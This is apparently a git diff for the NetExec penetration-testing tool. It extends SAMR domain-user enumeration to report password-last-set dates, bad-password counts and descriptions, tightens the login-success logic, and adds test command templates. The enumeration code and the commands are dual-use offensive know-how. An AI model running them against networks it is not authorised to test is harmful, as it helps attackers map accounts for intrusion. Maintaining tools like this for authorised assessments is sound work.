self.admin_privs = True
self.logger.success(f"{domain}\\{username}:{process_secret(password)} {self.mark_pwned()}")
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -323,7 +323,7 @@ class rdp(connection):
self.admin_privs = True
self.logger.success(f"{self.domain}\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}")
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)

View File

@ -317,7 +317,7 @@ class smb(connection):
out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth and not self.args.delegate:
if not self.args.local_auth and self.username != "" and not self.args.delegate:
add_user_bh(self.username, domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -380,7 +380,7 @@ class smb(connection):
out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
self.logger.debug(f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}")
@ -447,7 +447,7 @@ class smb(connection):
out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
self.db.add_admin_user("hash", domain, self.username, nthash, self.host, user_id=user_id)
@ -1008,8 +1008,10 @@ class smb(connection):
return groups
def users(self):
self.logger.display("Trying to dump local users with SAMRPC protocol")
return UserSamrDump(self).dump()
if len(self.args.users) > 0:
self.logger.debug(f"Dumping users: {', '.join(self.args.users)}")
return UserSamrDump(self).dump(self.args.users)
def hosts(self):
hosts = []

View File

@ -38,7 +38,7 @@ def proto_args(parser, std_parser, module_parser):
egroup.add_argument("--disks", action="store_true", help="enumerate disks")
egroup.add_argument("--loggedon-users-filter", action="store", help="only search for specific user, works with regex")
egroup.add_argument("--loggedon-users", action="store_true", help="enumerate logged on users")
egroup.add_argument("--users", nargs="?", const="", metavar="USER", help="enumerate domain users, if a user is specified than only its information is queried.")
egroup.add_argument("--users", nargs="*", metavar="USER", help="enumerate domain users, if a user is specified than only its information is queried.")
egroup.add_argument("--groups", nargs="?", const="", metavar="GROUP", help="enumerate domain groups, if a group is specified than its members are enumerated")
egroup.add_argument("--computers", nargs="?", const="", metavar="COMPUTER", help="enumerate computer users")
egroup.add_argument("--local-groups", nargs="?", const="", metavar="GROUP", help="enumerate local groups, if a group is specified then its members are enumerated")

View File

@ -4,6 +4,7 @@ from impacket.dcerpc.v5 import transport, samr
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
from impacket.nt_errors import STATUS_MORE_ENTRIES
from datetime import datetime, timedelta
class UserSamrDump:
@ -26,6 +27,8 @@ class UserSamrDump:
self.doKerberos = connection.kerberos
self.protocols = UserSamrDump.KNOWN_PROTOCOLS.keys()
self.users = []
self.rpc_transport = None
self.dce = None
if self.hash is not None:
if self.hash.find(":") != -1:
@ -36,46 +39,37 @@ class UserSamrDump:
if self.password is None:
self.password = ""
def dump(self):
def dump(self, requested_users=None):
# Try all requested protocols until one works.
for protocol in self.protocols:
try:
protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
except KeyError:
self.logger.debug(f"Invalid Protocol '{protocol}'")
self.logger.debug(f"Invalid Protocol: {protocol}")
self.logger.debug(f"Trying protocol {protocol}")
rpctransport = transport.SMBTransport(
self.addr,
port,
r"\samr",
self.username,
self.password,
self.domain,
self.lmhash,
self.nthash,
self.aesKey,
doKerberos=self.doKerberos,
)
self.rpc_transport = transport.SMBTransport(self.addr, port, r"\samr", self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey, doKerberos=self.doKerberos)
try:
self.fetchList(rpctransport)
self.fetch_users(requested_users)
break
except Exception as e:
self.logger.debug(f"Protocol failed: {e}")
self.logger.debug(f"Connection with protocol {protocol} failed: {e}")
return self.users
def fetchList(self, rpctransport):
dce = DCERPC_v5(rpctransport)
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
def fetch_users(self, requested_users):
self.dce = DCERPC_v5(self.rpc_transport)
self.dce.connect()
self.dce.bind(samr.MSRPC_UUID_SAMR)
# Setup Connection
resp = samr.hSamrConnect2(dce)
resp = samr.hSamrConnect2(self.dce)
if resp["ErrorCode"] != 0:
raise Exception("Connect error")
resp2 = samr.hSamrEnumerateDomainsInSamServer(
dce,
self.dce,
serverHandle=resp["ServerHandle"],
enumerationContext=0,
preferedMaximumLength=500,
@ -84,7 +78,7 @@ class UserSamrDump:
raise Exception("Connect error")
resp3 = samr.hSamrLookupDomainInSamServer(
dce,
self.dce,
serverHandle=resp["ServerHandle"],
name=resp2["Buffer"]["Buffer"][0]["Name"],
)
@ -92,7 +86,7 @@ class UserSamrDump:
raise Exception("Connect error")
resp4 = samr.hSamrOpenDomain(
dce,
self.dce,
serverHandle=resp["ServerHandle"],
desiredAccess=samr.MAXIMUM_ALLOWED,
domainId=resp3["DomainId"],
@ -101,28 +95,84 @@ class UserSamrDump:
raise Exception("Connect error")
self.__domains = resp2["Buffer"]["Buffer"]
domainHandle = resp4["DomainHandle"]
domain_handle = resp4["DomainHandle"]
# End Setup
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
if requested_users:
self.logger.debug(f"Looping through users requested and looking up their information: {requested_users}")
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext)
names_lookup_resp = samr.hSamrLookupNamesInDomain(self.dce, domain_handle, requested_users)
rids = [r["Data"] for r in names_lookup_resp["RelativeIds"]["Element"]]
self.logger.debug(f"Specific RIDs retrieved: {rids}")
users = self.get_user_info(domain_handle, rids)
except DCERPCException as e:
if str(e).find("STATUS_MORE_ENTRIES") < 0:
self.logger.fail("Error enumerating domain user(s)")
break
resp = e.get_packet()
self.logger.success("Enumerated domain user(s)")
for user in resp["Buffer"]["Buffer"]:
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"])
info_user = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation)["Buffer"]["All"]["AdminComment"]
self.logger.highlight(f"{self.domain}\\{user['Name']:<30} {info_user}")
self.users.append(user["Name"])
samr.hSamrCloseHandle(dce, r["UserHandle"])
self.logger.debug(f"Exception while requesting users in domain: {e}")
if "STATUS_SOME_NOT_MAPPED" in str(e):
# which user is not translated correctly isn't returned so we can't tell the user which is failing, which is very annoying
self.logger.fail("One of the users requested does not exist in the domain, causing a critical failure during translation, re-check the users and try again")
else:
self.logger.fail(f"Error occurred when looking up users in domain: {e}")
else:
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
enumerate_users_resp = samr.hSamrEnumerateUsersInDomain(self.dce, domain_handle, enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find("STATUS_MORE_ENTRIES") < 0:
self.logger.fail("Error enumerating domain user(s)")
break
enumerate_users_resp = e.get_packet()
enumerationContext = resp["EnumerationContext"]
status = resp["ErrorCode"]
rids = [r["RelativeId"] for r in enumerate_users_resp["Buffer"]["Buffer"]]
self.logger.debug(f"Full domain RIDs retrieved: {rids}")
users = self.get_user_info(domain_handle, rids)
dce.disconnect()
# set these for the while loop
enumerationContext = enumerate_users_resp["EnumerationContext"]
status = enumerate_users_resp["ErrorCode"]
self.print_user_info(users)
self.dce.disconnect()
def get_user_info(self, domain_handle, user_ids):
self.logger.debug(f"Getting user info for users: {user_ids}")
users = []
for user in user_ids:
self.logger.debug(f"Calling hSamrOpenUser for RID {user}")
open_user_resp = samr.hSamrOpenUser(
self.dce,
domain_handle,
samr.MAXIMUM_ALLOWED,
user
)
info_user_resp = samr.hSamrQueryInformationUser2(
self.dce,
open_user_resp["UserHandle"],
samr.USER_INFORMATION_CLASS.UserAllInformation
)["Buffer"]
user_info = info_user_resp["All"]
user_name = user_info["UserName"]
bad_pwd_count = user_info["BadPasswordCount"]
user_description = user_info["AdminComment"]
last_pw_set = old_large_int_to_datetime(user_info["PasswordLastSet"])
if last_pw_set == "1601-01-01 00:00:00":
last_pw_set = "<never>"
users.append({"name": user_name, "description": user_description, "bad_pwd_count": bad_pwd_count, "last_pw_set": last_pw_set})
samr.hSamrCloseHandle(self.dce, open_user_resp["UserHandle"])
return users
def print_user_info(self, users):
self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
for user in users:
self.logger.debug(f"Full user info: {user}")
self.logger.highlight(f"{user['name']:<30}{user['last_pw_set']:<20}{user['bad_pwd_count']:<8}{user['description']} ")
def old_large_int_to_datetime(large_int):
combined = (large_int["HighPart"] << 32) | large_int["LowPart"]
timestamp_seconds = combined / 10**7
start_date = datetime(1601, 1, 1)
return (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")

View File

@ -167,7 +167,7 @@ class winrm(connection):
self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id)
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except Exception as e:
@ -210,7 +210,7 @@ class winrm(connection):
self.db.add_admin_user("hash", domain, self.username, nthash, self.host)
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
return True

16
poetry.lock generated
View File

@ -1826,6 +1826,20 @@ tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
[package.extras]
testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"]
[[package]]
name = "python-dateutil"
version = "2.9.0.post0"
description = "Extensions to the standard Python datetime module"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
files = [
{file = "python-dateutil-2.9.0.post0.tar.gz", hash = "sha256:37dd54208da7e1cd875388217d5e00ebd4179249f90fb72437e91a35459a0ad3"},
{file = "python_dateutil-2.9.0.post0-py2.py3-none-any.whl", hash = "sha256:a8b2bc7bffae282281c8140a97d3aa9c14da0b136dfe83f850eea9a5f7470427"},
]
[package.dependencies]
six = ">=1.5"
[[package]]
name = "python-libnmap"
version = "0.7.3"
@ -2293,4 +2307,4 @@ testing = ["big-O", "jaraco.functools", "jaraco.itertools", "more-itertools", "p
[metadata]
lock-version = "2.0"
python-versions = "^3.8.0"
content-hash = "19dfeaa2fa332997fb149a591b147061c8da77e2f69b8734d7f988562231a4e7"
content-hash = "0bbd6a14b3478776b71e58b674942a5053c24fd2f802cc45ccd968f205a80167"

View File

@ -63,6 +63,7 @@ rich = "^13.3.5"
python-libnmap = "^0.7.3"
oscrypto = { git = "https://github.com/Pennyw0rth/oscrypto" } # Pypi version currently broken, see: https://github.com/wbond/oscrypto/issues/78 (as of 9/23)
argcomplete = "^3.1.4"
python-dateutil = ">=2.8.2"
[tool.poetry.group.dev.dependencies]
flake8 = "*"

View File

@ -183,6 +183,8 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-de
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-desc --options
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami --options
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pso
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pso --options
##### WINRM
netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS # need an extra space after this command due to regex
netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X whoami